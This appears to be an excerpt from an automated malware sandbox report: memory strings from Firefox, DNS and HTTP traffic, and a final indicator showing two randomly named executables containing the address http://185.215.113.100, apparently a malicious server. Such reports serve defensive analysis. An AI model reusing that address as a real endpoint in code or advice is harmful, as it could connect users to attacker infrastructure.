Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Could not find branch slug nimbus-desktop-experimentsmain/nimbus-desktop-experimentsrs-experiment-loader-timertaskbar.tasks.newTab.descriptionhttps://www.facebook.com/Could not find experiment slug recipes from Remote Settingsapp.update.lastUpdateTime.nimbus:studies-enabled-changednimbus.validation.enabled references unknown feature ID dom.beforeunload_timeout_msDOMAudioPlaybackBlockStopped_startTargetingSnapshottingTimerrequestStorageAccessUnderSite equals www.facebook.com (Facebook)
Source: 000003.log1.28.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log1.28.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log1.28.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://pubads.g.doubleclick.net/gampad/ad*://www.facebook.com/platform/impression.phphttps://ads.stickyadstv.com/firefox-etp://ads.stickyadstv.com/user-matching://.adsafeprotected.com//imp/://.adsafeprotected.com//Serving/://.adsafeprotected.com/jload?* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1883417146.000001EBEFC51000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1686886393.000001EBEFC51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.2096666282.000001EBFDC0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.2096666282.000001EBFDC0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["www.facebook.com","facebook.com"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["www.youtube.com","youtube.com"] equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chrome://global/skin/icons/security.svgcfr-doorhanger-feature-notificationcfr-doorhanger-milestone-close-buttonchrome://global/skin/icons/search-glass.svgdefault-browser-notification-messagedefault-browser-notification-button{dc8f61ab-5e98-4027-98ef-bb2ff6060d71}cfr-doorhanger-doh-secondary-button{b384b75c-c978-4c4d-b3cf-62a82d8f8f12}{dac8a935-4775-4918-9205-5c0600087dc4}{1cf918d2-f4ea-4b4f-b34e-455283fef19f}cfr-doorhanger-extension-manage-settings-button{09e26ae9-e9c1-477c-80a6-99934212f2fe}{ebf47fc8-01d8-4dba-aa04-2118402f4b20}cfr-doorhanger-extension-ok-buttonenhancerforyoutube@maximerf.addons.mozilla.orgWIKIPEDIA_CONTEXT_MENU_SEARCH_PARAMS{3923146e-98cb-472b-9c13-f6849d34d6b8} intersect topFrecentSites[.frecency >= tracking-protection-icon-container{e20e0de5-1667-4df4-bd69-705720e37391}Enhancer for YouTube"!chrome://browser/content/cfr-lightning.svgresource://gre/modules/BrowserUtils.sys.mjsmr2022-onboarding-existing-pin-checkbox-labelmr2022-onboarding-set-default-subtitlemr2022-onboarding-mobile-download-subtitle["www.wikipedia.org","wikipedia.org"]etp-promotions?as=u&utm_source=inproduct["www.facebook.com","facebook.com"]resource://gre/modules/XPCOMUtils.sys.mjsmr2022-onboarding-existing-pin-headermr2022-onboarding-mobile-download-titlemr2022-onboarding-mobile-download-cta-textmr2022-onboarding-mobile-download-image-altresource:///modules/ShellService.sys.mjsmr2022-onboarding-pin-private-image-altmr2022-onboarding-privacy-segmentation-image-altmr2022-onboarding-privacy-segmentation-titlemr2022-onboarding-privacy-segmentation-subtitlemr2022-onboarding-privacy-segmentation-text-ctaresource://nimbus/ExperimentAPI.sys.mjsresource://gre/modules/AppConstants.sys.mjsservices.sync.clients.devices.mobilechrome://browser/content/cfr-lightning-dark.svgmr2022-onboarding-secondary-skip-button-labelmr2022-onboarding-pin-primary-button-labelbrowser.dataFeatureRecommendations.enabledmr2022-onboarding-set-default-title["www.youtube.com","youtube.com"]browser.startup.upgradeDialog.pinPBM.disabledmr2022-onboarding-default-image-altmr2022-onboarding-existing-pin-subtitlemr2022-onboarding-import-image-altmr2022-onboarding-gratitude-subtitlemr2022-onboarding-gratitude-primary-button-labelfx100-thank-you-pin-primary-button-labelchrome://browser/content/assets/focus-promo.pngchrome://browser/content/assets/focus-logo.svgmr2022-onboarding-gratitude-image-altfluent:about-private-browsing-pin-promo-headerfluent:about-private-browsing-pin-promo-titlebrowser.privateWindowSeparation.enabledfluent:about-private-browsing-learn-more-linkScan the QR code to get Firefox Klar!inMr2022Holdback && doesAppNeedPrivatePinfluent:about-private-browsing-focus-promo-text-ccookiebanners.service.mode.privateBrowsingtracking-protection-icon-containeronboarding-start-browsing-button-labelbrowser.shell.checkDefaultBrowserfluent:about-private-browsing-focus-promo-ctamr2022-onboarding-gratitude-titlechrome://browser/content/assets/klar-qr-code.svg equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chrome://global/skin/icons/security.svgcfr-doorhanger-feature-notificationcfr-doorhanger-milestone-close-buttonchrome://global/skin/icons/search-glass.svgdefault-browser-notification-messagedefault-browser-notification-button{dc8f61ab-5e98-4027-98ef-bb2ff6060d71}cfr-doorhanger-doh-secondary-button{b384b75c-c978-4c4d-b3cf-62a82d8f8f12}{dac8a935-4775-4918-9205-5c0600087dc4}{1cf918d2-f4ea-4b4f-b34e-455283fef19f}cfr-doorhanger-extension-manage-settings-button{09e26ae9-e9c1-477c-80a6-99934212f2fe}{ebf47fc8-01d8-4dba-aa04-2118402f4b20}cfr-doorhanger-extension-ok-buttonenhancerforyoutube@maximerf.addons.mozilla.orgWIKIPEDIA_CONTEXT_MENU_SEARCH_PARAMS{3923146e-98cb-472b-9c13-f6849d34d6b8} intersect topFrecentSites[.frecency >= tracking-protection-icon-container{e20e0de5-1667-4df4-bd69-705720e37391}Enhancer for YouTube"!chrome://browser/content/cfr-lightning.svgresource://gre/modules/BrowserUtils.sys.mjsmr2022-onboarding-existing-pin-checkbox-labelmr2022-onboarding-set-default-subtitlemr2022-onboarding-mobile-download-subtitle["www.wikipedia.org","wikipedia.org"]etp-promotions?as=u&utm_source=inproduct["www.facebook.com","facebook.com"]resource://gre/modules/XPCOMUtils.sys.mjsmr2022-onboarding-existing-pin-headermr2022-onboarding-mobile-download-titlemr2022-onboarding-mobile-download-cta-textmr2022-onboarding-mobile-download-image-altresource:///modules/ShellService.sys.mjsmr2022-onboarding-pin-private-image-altmr2022-onboarding-privacy-segmentation-image-altmr2022-onboarding-privacy-segmentation-titlemr2022-onboarding-privacy-segmentation-subtitlemr2022-onboarding-privacy-segmentation-text-ctaresource://nimbus/ExperimentAPI.sys.mjsresource://gre/modules/AppConstants.sys.mjsservices.sync.clients.devices.mobilechrome://browser/content/cfr-lightning-dark.svgmr2022-onboarding-secondary-skip-button-labelmr2022-onboarding-pin-primary-button-labelbrowser.dataFeatureRecommendations.enabledmr2022-onboarding-set-default-title["www.youtube.com","youtube.com"]browser.startup.upgradeDialog.pinPBM.disabledmr2022-onboarding-default-image-altmr2022-onboarding-existing-pin-subtitlemr2022-onboarding-import-image-altmr2022-onboarding-gratitude-subtitlemr2022-onboarding-gratitude-primary-button-labelfx100-thank-you-pin-primary-button-labelchrome://browser/content/assets/focus-promo.pngchrome://browser/content/assets/focus-logo.svgmr2022-onboarding-gratitude-image-altfluent:about-private-browsing-pin-promo-headerfluent:about-private-browsing-pin-promo-titlebrowser.privateWindowSeparation.enabledfluent:about-private-browsing-learn-more-linkScan the QR code to get Firefox Klar!inMr2022Holdback && doesAppNeedPrivatePinfluent:about-private-browsing-focus-promo-text-ccookiebanners.service.mode.privateBrowsingtracking-protection-icon-containeronboarding-start-browsing-button-labelbrowser.shell.checkDefaultBrowserfluent:about-private-browsing-focus-promo-ctamr2022-onboarding-gratitude-titlechrome://browser/content/assets/klar-qr-code.svg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1886466860.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735580714.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1688787367.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000003.1886466860.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735580714.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1688787367.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: taskbar.tasks.newTab.descriptionhttps://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2096666282.000001EBFDC0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.2096666282.000001EBFDC0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.1681681490.000001EBF34C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1649737286.000001EBF34C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: 76251a0626.exe, 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, 88b8632b35.exe, 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100
